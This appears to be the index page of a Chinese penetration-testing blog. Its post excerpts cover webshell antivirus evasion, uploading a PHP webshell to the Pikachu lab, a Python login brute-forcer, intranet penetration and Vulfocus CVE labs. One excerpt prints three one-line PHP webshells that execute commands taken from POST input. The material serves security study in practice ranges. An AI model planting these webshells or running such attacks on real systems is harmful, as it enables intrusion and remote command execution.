ALe3

摘要： 终于也是来到了激动人心的时刻——免杀，这集先是简单的一句话木马的免杀 首先是经典的一句话木马： <?php system($_POST['xxx']); ?> <?php eval($_POST['xxx']); ?> <?php echo shell_exec($_POST['xxx']); ?> 阅读全文

摘要： BestShell/best_php_shell.php at master · Kevil-hui/BestShell 这里用到的是这位师傅的大马（主要是从头开始写一个大马实在太麻烦了） 用pikachu靶场进行上传的测试 在这里传马，这个是简单的前端校验，bp抓包改后缀就好了 上传成功后我们访问 阅读全文

摘要： import requests import time # 目标URL url = "http://192.168.3.101/pikachu/vul/burteforce/bf_form.php" # 请替换为实际的目标URL # 已知的用户名 username = "admin" # 密码字典文 阅读全文

摘要： 内网渗透，从字面上理解便是对目标服务器所在内网进行渗透并最终获取域控权限的一种渗透。内网渗透的前提需要获取一个Webshell，可以是低权限的Webshell，因为可以通过提权获取高权限。 在进行内网渗透之前需要了解一个概念，域环境。在内网中，往往可能存在几百上千台机器，例如需要对机器进行升级、打补 阅读全文

摘要： Ciallo～ (∠・ω< )⌒★ 柚子厨蒸鹅心 调了半个小时才调出来效果差不多的，直接贴出来吧 def show_start_screen(): print(r""" _____ _ _ _ _ / __ \ (_) | | | | | | | / \/ _ __ _ | | | | | | __ 阅读全文

摘要： 《python黑帽子》里面的，整体学完也是受益匪浅 首先是书中原本的代码 import argparse import socket import shlex #Split command import subprocess import sys import textwrap import thr 阅读全文

摘要： 单线程： import requests url=input("请输入URL：").strip() headers = { "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like 阅读全文

摘要： 单线程简易版： import requests # 获取 URL url = input("请输入 URL：").strip() headers = { "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.3 阅读全文

摘要： Vulfocus 漏洞威胁分析平台 很不错的在线漏洞靶场 目录 Vulfocus 漏洞威胁分析平台 很不错的在线漏洞靶场 Tomcat CVE-2017-12615 后台弱口令部署war包 CVE-2020-1938(文件包含) Apache Apache HTTPD多后缀解析漏洞 Apache H 阅读全文

摘要： 虽然最近试着挖了几个公益SRC，但是全部都重复是我没想到的 但是事已至此，还是水一篇Blog吧 公益SRC挖掘技巧 公益src只要挖掘一些简单的漏洞就好，测点sql注入，反射xss，弱口令之类的，再测点常见逻辑漏洞，比如忘记密码的验证之类的，建议挖几个入门后就可以尝试挖一下厂商专属SRC了 goog 阅读全文